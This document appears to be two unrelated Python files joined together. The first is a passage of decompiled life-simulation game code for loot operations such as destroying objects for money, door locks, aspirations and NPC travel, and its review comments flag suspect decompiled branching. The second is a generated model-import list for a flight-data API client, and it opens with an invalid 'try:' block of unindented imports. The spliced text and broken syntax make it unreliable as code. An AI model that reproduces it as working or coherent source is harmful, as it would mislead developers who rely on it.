    if source == DestroyObjectsFromInventorySource.ALL_STORAGE:
        return inventory
    if source == DestroyObjectsFromInventorySource.VISIBLE_STORAGE:
        return inventory.visible_storage
    if source == DestroyObjectsFromInventorySource.HIDDEN_STORAGE:
        return inventory.hidden_storage
    logger.error('Unknown object source type {} to check for objects to destroy.', source)
    return ()
def _get_objects_and_award_values(self, inventory, resolver):
    """Collect inventory objects that pass the tuned tests.

    Returns {object: per-unit award value}; values are 0 when awards are
    disabled.
    """
    return {candidate: (self._get_object_value(candidate, resolver) if self.award_value else 0)
            for candidate in self._get_object_source(inventory)
            if self.object_tests.run_tests(SingleObjectResolver(candidate))}
def _get_object_value(self, obj, resolver):
    """Award for one unit of *obj*: current value scaled by the tuned flat
    multiplier and any tested multipliers, truncated to an int."""
    recipient = resolver.get_participant(self.award_value.recipient)
    value_resolver = SingleActorAndObjectResolver(recipient, obj, self)
    tested_multiplier = self.award_value.tested_multipliers.get_multiplier(value_resolver)
    return int(obj.current_value * self.award_value.multiplier * tested_multiplier)
class DestroyTargetObjectsLootOp(BaseLootOperation):
    # Loot op that destroys the subject object itself -- from the household
    # inventory, from an object/sim inventory, or directly -- and optionally
    # awards the object's value to a Sim or a funds source.
    # NOTE(review): this class reads like decompiler output; several branch
    # nestings below are suspect (flagged inline). Confirm against original
    # sources before changing behavior.
    FACTORY_TUNABLES = {'award_value': OptionalTunable(description="\n If necessary, define how an amount corresponding to the objects'\n value is given to Sims.\n ",
      tunable=TunableTuple(recipient=TunableEnumEntry(description='\n Who to award funds to.\n ',
      tunable_type=ParticipantTypeSingleSim,
      default=(ParticipantTypeSingleSim.Actor),
      invalid_enums=(
     ParticipantTypeSingleSim.Invalid,)),
      funds=TunableEnumEntry(description='\n Where to award funds to. This can go to household\n funds by default, or to business funds.\n ',
      tunable_type=FundsSource,
      default=(FundsSource.HOUSEHOLD)),
      multiplier=TunableRange(description='\n Value multiplier for the award.\n ',
      tunable_type=float,
      default=1.0,
      minimum=0.0),
      tested_multipliers=TunableMultiplier.TunableFactory(description='\n Each multiplier that passes its test set will be applied to\n each award payment.\n ')))}

    def __init__(self, *args, award_value, **kwargs):
        # award_value: optional payout tuning (recipient/funds/multipliers);
        # None disables awards entirely.
        (super().__init__)(*args, **kwargs)
        self.award_value = award_value

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Destroy the subject object and optionally pay out its value.
        household = self._get_subject_household(subject)
        objects_to_destroy = self._get_objects_and_award_values(subject, resolver)
        award_value = 0
        for obj, value in objects_to_destroy.items():
            if household is not None:
                if obj.content_source == ContentSource.HOUSEHOLD_INVENTORY_PROXY:
                    # Removing from household inventory may itself refund money;
                    # subtract that delta so the object is not paid for twice.
                    original_household_funds = household.funds.money
                    removed_from_household_inventory = build_buy.remove_object_from_household_inventory(obj.id, household)
                    if removed_from_household_inventory:
                        award_value -= household.funds.money - original_household_funds
                        obj.destroy(source=self, cause='Destroying specified objects from loot op.')
                        if self.award_value:
                            award_value += value
                    else:
                        logger.error('Failed to destroy object {} ({})', obj, removed_from_household_inventory)
                else:
                    # NOTE(review): as decompiled, non-proxy objects are skipped
                    # whenever a household exists -- verify this is intended.
                    continue
            inventory = self._get_object_inventory(obj)
            if inventory is not None and inventory.try_destroy_object(obj, source=self, cause='Destroying specified objects from inventory loot op.'):
                if self.award_value:
                    award_value += value
            else:
                logger.error('Error trying to destroy object {}.', obj)
        if award_value != 0:
            tags = set()
            if resolver.interaction is not None:
                tags |= resolver.interaction.get_category_tags()
            else:
                # NOTE(review): the payout below only runs when there is no
                # interaction; this looks like decompiler mis-nesting (funds /
                # recipient would otherwise be undefined) -- confirm before
                # relying on this flow.
                funds = None
                recipient = None
                if self.award_value is not None:
                    recipient = resolver.get_participant(self.award_value.recipient).get_sim_instance()
                    funds = get_funds_for_source((self.award_value.funds), sim=recipient)
                else:
                    if household is not None:
                        funds = household.funds
                if funds is not None:
                    if award_value < 0:
                        # Negative net award: claw back money, best effort.
                        funds.try_remove_amount((-award_value), (Consts_pb2.TELEMETRY_OBJECT_SELL), sim=recipient,
                          require_full_amount=False)
                    else:
                        funds.add(award_value, (Consts_pb2.TELEMETRY_OBJECT_SELL), sim=recipient, tags=tags)

    def get_simoleon_delta(self, interaction, target, context, **interaction_parameters):
        # UI prediction hook: (expected Simoleon delta, funds source) without
        # destroying anything.
        if self.award_value is None:
            return (
             0, FundsSource.HOUSEHOLD)
        resolver = (interaction.get_resolver)(target, context, **interaction_parameters)
        subject = resolver.get_participant(self.subject)
        objects_values = self._get_objects_and_award_values(subject, resolver)
        award_value = 0
        for value in objects_values.values():
            award_value += value
        return (award_value, self.award_value.funds)

    def _get_object_inventory(self, obj):
        # Inventory component of the object's inventory owner, or None.
        # Sims are never destroyed through this path.
        if obj.is_sim:
            return
        inventoryitem_component = getattr(obj, 'inventoryitem_component', None)
        if inventoryitem_component is not None:
            if inventoryitem_component.inventory_owner is not None:
                return getattr(inventoryitem_component.inventory_owner, 'inventory_component', None)

    def _get_subject_household(self, subject):
        # Household of the subject: the Sim's own household, or the owning
        # household of an object; None when unowned.
        if subject.is_sim:
            return subject.household
        if subject.household_owner_id is not None:
            return services.household_manager().get(subject.household_owner_id)

    def _get_objects_and_award_values(self, subject, resolver):
        # This op destroys the subject itself, so the mapping is just
        # {subject: award value}.
        objects_to_destroy = {}
        objects_to_destroy[subject] = self._get_object_value(subject, resolver)
        return objects_to_destroy

    def _get_object_value(self, obj, resolver):
        # Award for *obj*: current value scaled by the tuned multiplier and
        # any tested multipliers; 0 when awards are disabled.
        if self.award_value:
            resolver = SingleActorAndObjectResolver(resolver.get_participant(self.award_value.recipient), obj, self)
            multiplier = self.award_value.tested_multipliers.get_multiplier(resolver)
            return int(obj.current_value * self.award_value.multiplier * multiplier)
        return 0
class RemoveNotebookEntry(BaseLootOperation):
    """Loot operation that removes notebook entries from the subject Sim,
    either a whole subcategory or specific tuned entry references."""
    FACTORY_TUNABLES = {
     'subcategory_id':TunableEnumEntry(description='\n Subcategory type.\n ',
       tunable_type=NotebookSubCategories,
       default=NotebookSubCategories.INVALID,
       invalid_enums=(
      NotebookSubCategories.INVALID,)),
     'removal_type':OptionalTunable(description='\n Option to select if we want to remove by subcategory (like remove\n all clues) or by a specific entry.\n ',
       tunable=TunableList(description='\n List of entries to be removed.\n ',
       tunable=TunableReference(description="\n The entry that will be removed from the player's notebook.\n ",
       manager=(services.get_instance_manager(sims4.resources.Types.NOTEBOOK_ENTRY)),
       pack_safe=True)),
       disabled_name='all_entries',
       enabled_name='remove_by_reference')}

    def __init__(self, *args, subcategory_id, removal_type, **kwargs):
        super().__init__(*args, **kwargs)
        self.subcategory_id = subcategory_id
        self.removal_type = removal_type

    def _apply_to_subject_and_target(self, subject, target, resolver):
        """Remove every entry in the tuned subcategory, or only the tuned
        references when removal_type is enabled."""
        if not subject.is_sim:
            logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
            return
        tracker = subject.notebook_tracker
        if tracker is None:
            logger.warn("Trying to remove a notebook entry from {}, but they don't have a notebook. LOD issue?", subject)
            return
        if self.removal_type is None:
            tracker.remove_entries_by_subcategory(self.subcategory_id)
            return
        for entry in self.removal_type:
            tracker.remove_entry_by_reference(self.subcategory_id, entry)
class IncrementCommunityChallengeCount(BaseLootOperation):
    """Loot operation that asks the server to bump the community challenge
    collectable count by a tuned amount."""
    FACTORY_TUNABLES = {'count': Tunable(description='\n The number to increment the community count by.\n ',
      tunable_type=int,
      default=1)}

    def __init__(self, *args, count, **kwargs):
        super().__init__(*args, **kwargs)
        self._count = count

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Build the protobuf and hand it to the distributor with no owner --
        # this op has no per-object state to attach to.
        message = UI_pb2.IncrementCommunityCollectableCount()
        message.count = self._count
        op = GenericProtocolBufferOp(DistributorOps_pb2.Operation.MSG_INCREMENT_COMMUNITY_COLLECTABLE_COUNT, message)
        Distributor.instance().add_op_with_no_owner(op)
def _validate_lock_target(loot, target):
    """Return True when *target* has a locking component; otherwise log an
    error and return False."""
    if target.has_locking_component():
        return True
    logger.error('Target {} is not locked out by the loot {}.', target, loot, owner='mkartika')
    return False
def _validate_lock_subject_and_target(loot, subject, target):
    """Validate that *subject* is a Sim and *target* has a locking component.

    Returns True only when both checks pass; the first failing check is
    logged. The decompiled original ended with
    ``return _validate_lock_target(...) or False`` followed by an unreachable
    ``return True`` -- both collapse to the direct call below.
    """
    if not subject.is_sim:
        logger.error('Subject {} is not a Sim for the loot {}.', subject, loot, owner='mkartika')
        return False
    return _validate_lock_target(loot, target)
class LockDoor(BaseTargetedLootOperation):
    # Loot op that adds tuned lock data to the target object's locking
    # component (e.g. locking a door against certain Sims).

    @staticmethod
    def _verify_tunable_callback(instance_class, tunable_name, source, value):
        # Tuning-time validation: updating an existing lock in place
        # (replace_same_lock_type=False) is only supported for
        # LockAllWithSimIdExceptionData.
        if not value.replace_same_lock_type:
            if value.lock_data.factory is not LockAllWithSimIdExceptionData:
                logger.error('Lock Data {} is tuned to not replace same lock type. This is not supported.', (value.lock_data.factory), owner='nsavalani')

    FACTORY_TUNABLES = {'lock_data':TunableVariant(lock_all_with_simid_exception=LockAllWithSimIdExceptionData.TunableFactory(),
      lock_all_with_situation_job_exception=LockAllWithSituationJobExceptionData.TunableFactory(),
      lock_all_with_genus_exception=LockAllWithGenusException.TunableFactory(),
      lock_ranked_statistic=LockRankedStatisticData.TunableFactory(),
      default='lock_all_with_simid_exception'),
     'replace_same_lock_type':Tunable(description='\n If True, it will replace the same type of lock data in the locking\n component, otherwise it will update the existing data.\n ',
      tunable_type=bool,
      default=True),
     'clear_existing_locks':TunableEnumEntry(description='\n Which locks should be cleared before adding the new lock data.\n ',
      tunable_type=ClearLock,
      default=ClearLock.CLEAR_ALL),
     'verify_tunable_callback':_verify_tunable_callback}

    def __init__(self, *args, lock_data, replace_same_lock_type, clear_existing_locks, **kwargs):
        (super().__init__)(*args, **kwargs)
        self.lock_data = lock_data
        self.replace_same_lock_type = replace_same_lock_type
        self.clear_existing_locks = clear_existing_locks

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Requires a Sim subject and a lockable target; failures are logged by
        # the validator and silently abort the op.
        if not _validate_lock_subject_and_target(self, subject, target):
            return
        lock_data = self.lock_data()
        lock_data.setup_data(subject, target, resolver)
        target.add_lock_data(lock_data, replace_same_lock_type=(self.replace_same_lock_type),
          clear_existing_locks=(self.clear_existing_locks))

    @TunableFactory.factory_option
    def target_participant_type_options(description='The object to lock.', **kwargs):
        # Factory option: defaults this loot's target participant to Object.
        return (BaseLootOperation.get_participant_tunable)('target_participant_type', description=description,
          default_participant=ParticipantType.Object, **kwargs)
class UnlockDoor(BaseTargetedLootOperation):
    # Loot op that removes player-priority locks (optionally of a single tuned
    # LockType) from the target object.
    FACTORY_TUNABLES = {'unlock_type': OptionalTunable(description='\n The type of the lock we want to remove, by default should be everything.\n ',
      tunable=TunableEnumEntry(tunable_type=LockType,
      default=(LockType.LOCK_ALL_WITH_SIMID_EXCEPTION)),
      disabled_name='unlock_every_type')}

    def __init__(self, *args, unlock_type, **kwargs):
        # unlock_type: LockType to remove, or None to remove every type.
        (super().__init__)(*args, **kwargs)
        self.unlock_type = unlock_type

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Abort (with a logged error) when the target has no locking component.
        if not _validate_lock_target(self, target):
            return
        # Only player-priority locks are removed by this op.
        target.remove_locks(lock_type=(self.unlock_type), lock_priority=(LockPriority.PLAYER_LOCK))

    @TunableFactory.factory_option
    def target_participant_type_options(description='The object to unlock.', **kwargs):
        # Factory option: defaults this loot's target participant to Object.
        return (BaseLootOperation.get_participant_tunable)('target_participant_type', description=description,
          default_participant=ParticipantType.Object, **kwargs)
class UnlockHiddenAspirationTrack(BaseLootOperation):
    """Loot operation that unlocks a hidden aspiration track so the player can
    select it during gameplay."""
    FACTORY_TUNABLES = {'aspiration_track': TunableReference(description='\n The Hidden Aspiration Track to unlock so that is can be selected during gameplay.',
      manager=(services.get_instance_manager(sims4.resources.Types.ASPIRATION_TRACK)))}

    def __init__(self, *args, aspiration_track, **kwargs):
        super().__init__(*args, **kwargs)
        self._aspiration_track = aspiration_track

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if not subject.is_sim:
            logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
            return
        tracker = subject.sim_info.aspiration_tracker
        if tracker is None:
            logger.error('Attempting to unlock a hidden aspiration for NPC {} in loot {}', self.subject, self)
            return
        tracker.unlock_hidden_aspiration_track(self._aspiration_track)
class SetPrimaryAspirationTrack(BaseLootOperation):
    """Loot operation that sets the subject Sim's primary aspiration track."""
    FACTORY_TUNABLES = {'aspiration_track': TunableReference(description='\n The Aspiration Track to set as primary',
      manager=(services.get_instance_manager(sims4.resources.Types.ASPIRATION_TRACK)))}

    def __init__(self, *args, aspiration_track, **kwargs):
        super().__init__(*args, **kwargs)
        self._aspiration_track = aspiration_track

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if subject.is_sim:
            subject.sim_info.primary_aspiration = self._aspiration_track
        else:
            logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
class ResetAspiration(BaseTargetedLootOperation):
    """Loot operation that resets progress on a tuned aspiration milestone for
    the subject Sim. Silently no-ops when the Sim has no aspiration tracker."""
    FACTORY_TUNABLES = {'aspiration': TunableReference(description='\n The aspiration that we want to reset.\n ',
      manager=(services.get_instance_manager(sims4.resources.Types.ASPIRATION)))}

    def __init__(self, *args, aspiration, **kwargs):
        super().__init__(*args, **kwargs)
        self.aspiration = aspiration

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if not subject.is_sim:
            logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
            return
        tracker = subject.aspiration_tracker
        if tracker is not None:
            tracker.reset_milestone(self.aspiration)
class SummonNPC(BaseLootOperation):
    """Loot operation that summons the target Sim to the lot through the
    active venue, using a tuned summoning purpose."""
    FACTORY_TUNABLES = {'summoning_purpose': TunableEnumEntry(description='\n The purpose that is used to summon the NPC to the lot. Defined\n in venue tuning.\n ',
      tunable_type=(venues.venue_constants.NPCSummoningPurpose),
      default=(venues.venue_constants.NPCSummoningPurpose.DEFAULT))}

    def __init__(self, *args, summoning_purpose, **kwargs):
        super().__init__(*args, **kwargs)
        self.summoning_purpose = summoning_purpose

    @property
    def target_participant_type(self):
        # This loot always operates on the TargetSim participant.
        return ParticipantType.TargetSim

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if not target.is_sim:
            logger.error('target {} is not a Sim for the loot {}.', target, self, owner='cjiang')
            return False
        active_venue = services.current_zone().venue_service.active_venue
        active_venue.summon_npcs((target,), self.summoning_purpose)
class TravelToTargetSim(BaseLootOperation):
    """Loot operation that travels the subject Sim to the target Sim's home
    zone.

    Sends a TravelSimsToZone message through the distributor and pauses the
    game clock; no-ops while a save is locked.
    """

    @property
    def target_participant_type(self):
        # This loot always operates on the TargetSim participant.
        return ParticipantType.TargetSim

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # The decompiled original unconditionally returned False for any valid
        # subject before the travel code could run (`target.is_sim or
        # logger.error(...)` followed by `return False`); restore the evident
        # intent of two independent guard clauses.
        if not subject.is_sim:
            logger.error('subject {} is not a Sim for the loot {}.', subject, self, owner='cjiang')
            return False
        if not target.is_sim:
            logger.error('target {} is not a Sim for the loot {}.', target, self, owner='cjiang')
            return False
        # Travel during a locked save would be lost/corrupting; bail quietly.
        if services.get_persistence_service().is_save_locked():
            return
        travel_info = TravelSimsToZone()
        travel_info.zone_id = target.household.home_zone_id
        travel_info.sim_ids.append(subject.id)
        distributor.system.Distributor.instance().add_event(Consts_pb2.MSG_TRAVEL_SIMS_TO_ZONE, travel_info)
        # Pause so the player does not miss the zone transition.
        services.game_clock_service().set_clock_speed(ClockSpeedMode.PAUSED)
class SlotObjects(BaseTargetedLootOperation):
    """Loot operation that slots objects from a transfer source onto the
    target using a tuned slot strategy."""
    FACTORY_TUNABLES = {'slot_strategy': SlotStrategyVariant(description='\n The slot strategy we want to use to place objects from the transfer\n source into slots on the target.\n ')}

    def __init__(self, *args, slot_strategy, **kwargs):
        super().__init__(*args, **kwargs)
        self.slot_strategy = slot_strategy

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Instantiate the tuned strategy against this resolver and run it;
        # failure is logged but not fatal.
        strategy = self.slot_strategy(resolver)
        if not strategy.slot_objects():
            logger.warn('Failed to slot objects. ')
class ForceSpawnObjects(BaseTargetedLootOperation):
    """Loot operation that forces the target's spawner component to spawn for
    each of its spawner datas.

    For slot-type spawners the requested spawn count equals the number of
    empty, non-prohibited runtime slots on the target.
    """

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if target.spawner_component is None:
            logger.error('Target {} does not have a spawner component.', target, owner='amwu')
            return
        for data in target.spawner_component.spawner_data:
            spawn_type = data.spawner_option.spawn_type
            if spawn_type != SpawnerType.SLOT:
                target.force_spawn_object(spawn_type=spawn_type)
                continue
            # Hoisted out of the slot loop: the gardening component does not
            # change per slot.
            gardening_component = target.get_component(types.GARDENING_COMPONENT)
            empty_slot_count = 0
            for slot in target.get_runtime_slots_gen():
                spawn_prohibited = gardening_component is not None and gardening_component.is_prohibited_spawn_slot(slot.slot_name_hash, target)
                # The decompiled original read `spawn_prohibited or
                # empty_slot_count += 1`, which is not valid Python; the intent
                # is to count only empty slots where spawning is allowed.
                if slot.empty and not spawn_prohibited:
                    empty_slot_count += 1
            target.force_spawn_object(spawn_type=spawn_type, create_slot_obj_count=empty_slot_count)
class DoNothingLootOp(BaseLootOperation):
    """Intentionally empty loot operation; usable as a tuning placeholder."""

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Deliberate no-op.
        pass
# emsapi/models/__init__.py
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
try:
from .adi_ems_web_api_v2_model_analytic_analytic_id_py3 import AdiEmsWebApiV2ModelAnalyticAnalyticId
from .adi_ems_web_api_v2_dto_analytic_info_py3 import AdiEmsWebApiV2DtoAnalyticInfo
from .adi_ems_web_api_model_error_py3 import AdiEmsWebApiModelError
from .adi_ems_web_api_v2_dto_analytic_group_py3 import AdiEmsWebApiV2DtoAnalyticGroup
from .adi_ems_web_api_v2_dto_analytic_group_contents_py3 import AdiEmsWebApiV2DtoAnalyticGroupContents
from .adi_ems_web_api_v2_model_analytic_analytic_select_py3 import AdiEmsWebApiV2ModelAnalyticAnalyticSelect
from .adi_ems_web_api_v2_model_analytic_offset_type_py3 import AdiEmsWebApiV2ModelAnalyticOffsetType
from .adi_ems_web_api_v2_model_analytic_query_py3 import AdiEmsWebApiV2ModelAnalyticQuery
from .adi_ems_web_api_v2_model_analytic_analytic_result_py3 import AdiEmsWebApiV2ModelAnalyticAnalyticResult
from .adi_ems_web_api_v2_model_analytic_query_result_py3 import AdiEmsWebApiV2ModelAnalyticQueryResult
from .adi_ems_web_api_v2_dto_metadata_item_py3 import AdiEmsWebApiV2DtoMetadataItem
from .adi_ems_web_api_v2_dto_metadata_py3 import AdiEmsWebApiV2DtoMetadata
from .adi_ems_web_api_core_dto_data_range_py3 import AdiEmsWebApiCoreDtoDataRange
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_item_py3 import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetItem
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_py3 import AdiEmsWebApiV2DtoAnalyticSetAnalyticSet
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_group_py3 import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetGroup
from .adi_ems_web_api_v2_dto_asset_fleet_py3 import AdiEmsWebApiV2DtoAssetFleet
from .adi_ems_web_api_v2_dto_asset_aircraft_py3 import AdiEmsWebApiV2DtoAssetAircraft
from .adi_ems_web_api_v2_dto_asset_flight_phase_py3 import AdiEmsWebApiV2DtoAssetFlightPhase
from .adi_ems_web_api_v2_dto_asset_airport_py3 import AdiEmsWebApiV2DtoAssetAirport
from .adi_ems_web_api_v2_dto_schema_primary_key_field_py3 import AdiEmsWebApiV2DtoSchemaPrimaryKeyField
from .adi_ems_web_api_v2_dto_schema_database_py3 import AdiEmsWebApiV2DtoSchemaDatabase
from .adi_ems_web_api_v2_dto_schema_database_group_py3 import AdiEmsWebApiV2DtoSchemaDatabaseGroup
from .adi_ems_web_api_v2_dto_schema_field_py3 import AdiEmsWebApiV2DtoSchemaField
from .adi_ems_web_api_v2_dto_schema_field_group_py3 import AdiEmsWebApiV2DtoSchemaFieldGroup
from .adi_ems_web_api_v2_dto_schema_select_column_py3 import AdiEmsWebApiV2DtoSchemaSelectColumn
from .adi_ems_web_api_v2_dto_schema_group_by_column_py3 import AdiEmsWebApiV2DtoSchemaGroupByColumn
from .adi_ems_web_api_v2_dto_schema_order_by_column_py3 import AdiEmsWebApiV2DtoSchemaOrderByColumn
from .adi_ems_web_api_v2_dto_schema_filter_argument_py3 import AdiEmsWebApiV2DtoSchemaFilterArgument
from .adi_ems_web_api_v2_dto_schema_filter_py3 import AdiEmsWebApiV2DtoSchemaFilter
from .adi_ems_web_api_v2_dto_schema_query_py3 import AdiEmsWebApiV2DtoSchemaQuery
from .adi_ems_web_api_v2_dto_schema_query_result_header_py3 import AdiEmsWebApiV2DtoSchemaQueryResultHeader
from .adi_ems_web_api_v2_dto_schema_query_result_py3 import AdiEmsWebApiV2DtoSchemaQueryResult
from .adi_ems_web_api_v2_dto_schema_async_query_info_py3 import AdiEmsWebApiV2DtoSchemaAsyncQueryInfo
from .adi_ems_web_api_v2_dto_schema_async_query_data_py3 import AdiEmsWebApiV2DtoSchemaAsyncQueryData
from .adi_ems_web_api_v2_dto_schema_column_py3 import AdiEmsWebApiV2DtoSchemaColumn
from .adi_ems_web_api_v2_dto_schema_create_py3 import AdiEmsWebApiV2DtoSchemaCreate
from .adi_ems_web_api_v2_dto_schema_create_result_py3 import AdiEmsWebApiV2DtoSchemaCreateResult
from .adi_ems_web_api_v2_dto_schema_update_py3 import AdiEmsWebApiV2DtoSchemaUpdate
from .adi_ems_web_api_v2_dto_schema_update_result_py3 import AdiEmsWebApiV2DtoSchemaUpdateResult
from .adi_ems_web_api_v2_dto_schema_delete_py3 import AdiEmsWebApiV2DtoSchemaDelete
from .adi_ems_web_api_v2_dto_schema_delete_result_py3 import AdiEmsWebApiV2DtoSchemaDeleteResult
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_value_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResultValue
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_comment_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResultComment
from .adi_ems_web_api_v2_dto_ems_profile_profile_results_event_record_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_ems_profile_profile_results_py3 import AdiEmsWebApiV2DtoEmsProfileProfileResults
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile_py3 import AdiEmsWebApiV2DtoEmsProfileEmsProfile
from .adi_ems_web_api_v2_dto_ems_profile_glossary_item_py3 import AdiEmsWebApiV2DtoEmsProfileGlossaryItem
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile_glossary_py3 import AdiEmsWebApiV2DtoEmsProfileEmsProfileGlossary
from .adi_ems_web_data_model_ems_system_py3 import AdiEmsWebDataModelEmsSystem
from .adi_ems_web_api_v2_dto_navigation_navigation_airport_py3 import AdiEmsWebApiV2DtoNavigationNavigationAirport
from .adi_ems_web_api_v2_dto_navigation_navigation_runway_py3 import AdiEmsWebApiV2DtoNavigationNavigationRunway
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_py3 import AdiEmsWebApiV2DtoNavigationNavigationProcedure
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment_navaid_py3 import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegmentNavaid
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment_py3 import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegment
from .adi_ems_web_api_v2_dto_navigation_navigation_waypoint_py3 import AdiEmsWebApiV2DtoNavigationNavigationWaypoint
from .adi_ems_web_api_v2_dto_navigation_navigation_navaid_py3 import AdiEmsWebApiV2DtoNavigationNavigationNavaid
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_item_py3 import AdiEmsWebApiV2DtoParameterSetParameterSetItem
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_py3 import AdiEmsWebApiV2DtoParameterSetParameterSet
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_group_py3 import AdiEmsWebApiV2DtoParameterSetParameterSetGroup
from .adi_ems_web_api_v2_dto_profile_profile_result_value_py3 import AdiEmsWebApiV2DtoProfileProfileResultValue
from .adi_ems_web_api_v2_dto_profile_profile_result_comment_py3 import AdiEmsWebApiV2DtoProfileProfileResultComment
from .adi_ems_web_api_v2_dto_profile_profile_results_event_record_py3 import AdiEmsWebApiV2DtoProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_profile_processing_information_py3 import AdiEmsWebApiV2DtoProfileProcessingInformation
from .adi_ems_web_api_v2_dto_profile_profile_results_py3 import AdiEmsWebApiV2DtoProfileProfileResults
from .adi_ems_web_api_v2_dto_profile_profile_py3 import AdiEmsWebApiV2DtoProfileProfile
from .adi_ems_web_api_v2_dto_profile_profile_group_py3 import AdiEmsWebApiV2DtoProfileProfileGroup
from .adi_ems_web_api_v2_dto_profile_glossary_item_py3 import AdiEmsWebApiV2DtoProfileGlossaryItem
from .adi_ems_web_api_v2_dto_profile_profile_glossary_py3 import AdiEmsWebApiV2DtoProfileProfileGlossary
from .adi_ems_web_api_v2_dto_profile_event_py3 import AdiEmsWebApiV2DtoProfileEvent
from .adi_ems_web_api_v2_model_tableau_trusted_py3 import AdiEmsWebApiV2ModelTableauTrusted
from .adi_ems_web_api_v2_model_tableau_tableau_server_py3 import AdiEmsWebApiV2ModelTableauTableauServer
from .adi_ems_web_shared_tableau_rest_site_py3 import AdiEmsWebSharedTableauRestSite
from .adi_ems_web_shared_tableau_rest_project_py3 import AdiEmsWebSharedTableauRestProject
from .adi_ems_web_shared_tableau_rest_user_py3 import AdiEmsWebSharedTableauRestUser
from .adi_ems_web_shared_tableau_rest_tag_py3 import AdiEmsWebSharedTableauRestTag
from .adi_ems_web_shared_tableau_rest_tags_py3 import AdiEmsWebSharedTableauRestTags
from .adi_ems_web_shared_tableau_rest_view_py3 import AdiEmsWebSharedTableauRestView
from .adi_ems_web_shared_tableau_rest_views_py3 import AdiEmsWebSharedTableauRestViews
from .adi_ems_web_shared_tableau_rest_workbook_py3 import AdiEmsWebSharedTableauRestWorkbook
from .adi_ems_web_api_v2_dto_trajectory_value_py3 import AdiEmsWebApiV2DtoTrajectoryValue
from .adi_ems_web_api_v2_dto_trajectory_value_array_py3 import AdiEmsWebApiV2DtoTrajectoryValueArray
from .adi_ems_web_api_v2_dto_trajectory_configuration_py3 import AdiEmsWebApiV2DtoTrajectoryConfiguration
from .adi_ems_web_api_v2_dto_upload_upload_request_py3 import AdiEmsWebApiV2DtoUploadUploadRequest
from .adi_ems_web_api_v2_dto_upload_upload_parameters_py3 import AdiEmsWebApiV2DtoUploadUploadParameters
from .adi_ems_web_api_v2_dto_upload_upload_result_py3 import AdiEmsWebApiV2DtoUploadUploadResult
from .adi_ems_web_api_v2_dto_upload_upload_status_py3 import AdiEmsWebApiV2DtoUploadUploadStatus
from .adi_ems_web_api_v2_dto_upload_upload_record_py3 import AdiEmsWebApiV2DtoUploadUploadRecord
from .adi_ems_web_api_v2_dto_upload_upload_processing_flight_status_py3 import AdiEmsWebApiV2DtoUploadUploadProcessingFlightStatus
from .adi_ems_web_api_v2_dto_upload_upload_processing_status_py3 import AdiEmsWebApiV2DtoUploadUploadProcessingStatus
from .adi_ems_web_api_v2_dto_upload_bucket_py3 import AdiEmsWebApiV2DtoUploadBucket
from .adi_ems_web_api_v2_dto_weather_taf_taf_parse_options_py3 import AdiEmsWebApiV2DtoWeatherTafTafParseOptions
from .adi_ems_web_api_v2_dto_weather_cloud_condition_py3 import AdiEmsWebApiV2DtoWeatherCloudCondition
from .adi_ems_web_api_v2_dto_weather_taf_icing_condition_py3 import AdiEmsWebApiV2DtoWeatherTafIcingCondition
from .adi_ems_web_api_v2_dto_weather_taf_turbulence_condition_py3 import AdiEmsWebApiV2DtoWeatherTafTurbulenceCondition
from .adi_ems_web_api_v2_dto_weather_taf_temperature_py3 import AdiEmsWebApiV2DtoWeatherTafTemperature
from .adi_ems_web_api_v2_dto_weather_taf_prediction_py3 import AdiEmsWebApiV2DtoWeatherTafPrediction
from .adi_ems_web_api_v2_dto_weather_taf_taf_report_py3 import AdiEmsWebApiV2DtoWeatherTafTafReport
from .adi_ems_web_api_v2_dto_weather_metar_metar_parse_options_py3 import AdiEmsWebApiV2DtoWeatherMetarMetarParseOptions
from .adi_ems_web_api_v2_dto_weather_metar_runway_visual_range_py3 import AdiEmsWebApiV2DtoWeatherMetarRunwayVisualRange
from .adi_ems_web_api_v2_dto_weather_weather_phenomenon_py3 import AdiEmsWebApiV2DtoWeatherWeatherPhenomenon
from .adi_ems_web_api_v2_dto_weather_metar_runway_condition_py3 import AdiEmsWebApiV2DtoWeatherMetarRunwayCondition
from .adi_ems_web_api_v2_dto_weather_metar_metar_report_py3 import AdiEmsWebApiV2DtoWeatherMetarMetarReport
from .adi_ems_web_api_v2_dto_weather_taf_taf_query_py3 import AdiEmsWebApiV2DtoWeatherTafTafQuery
